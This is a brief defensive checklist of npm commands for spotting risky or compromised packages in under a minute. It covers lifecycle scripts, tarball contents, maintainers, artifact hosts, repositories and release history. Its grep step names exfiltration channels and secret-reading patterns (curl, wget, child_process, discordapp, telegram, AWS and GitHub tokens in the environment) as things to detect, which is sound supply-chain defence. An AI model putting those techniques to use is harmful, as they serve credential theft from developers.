Fast Triage
Copy-paste checks to identify risky packages in under 60 seconds.
1) Inspect scripts
npm view <pkg>@<ver> scripts --jsonLook for lifecycle scripts: preinstall, install, postinstall, prepare. These run during npm i and can do anything — including network calls or file access.
2) Download and grep the tarball
npm pack <pkg>@<ver> && tar -xzf <pkg>-<ver>.tgz -C pkg && grep -RInE 'preinstall|postinstall|prepare|child_process|execSync|spawn|curl|wget|Invoke-WebRequest|discordapp|telegram|process.env.(AWS|NPM|GITHUB|TOKEN|KEY|SECRET)' pkg/Search for risky patterns: child_process, network APIs, env tokens, and obfuscation. If these appear in lifecycle files, treat as high risk.
3) Check maintainers & publish history
npm view <pkg> maintainers time --jsonRed flags: new maintainer recently, repo archived/removed, unusual version jumps. Legit packages can be compromised via accounts.
4) Get tarball URL
npm view <pkg>@<ver> dist.tarballUse to verify the release artifact host. Prefer npm registry and GitHub Releases/CDNs. Unknown hosts warrant extra scrutiny.
5) Find repository URL
npm view <pkg> repository url --jsonConfirm there is a real, active upstream repo with history, issues, and maintainers. Empty or missing repos are suspicious.
6) List versions and publish times
npm view <pkg> versions time --jsonLook for bursts of releases or sudden major changes — common during compromises or malicious takeovers.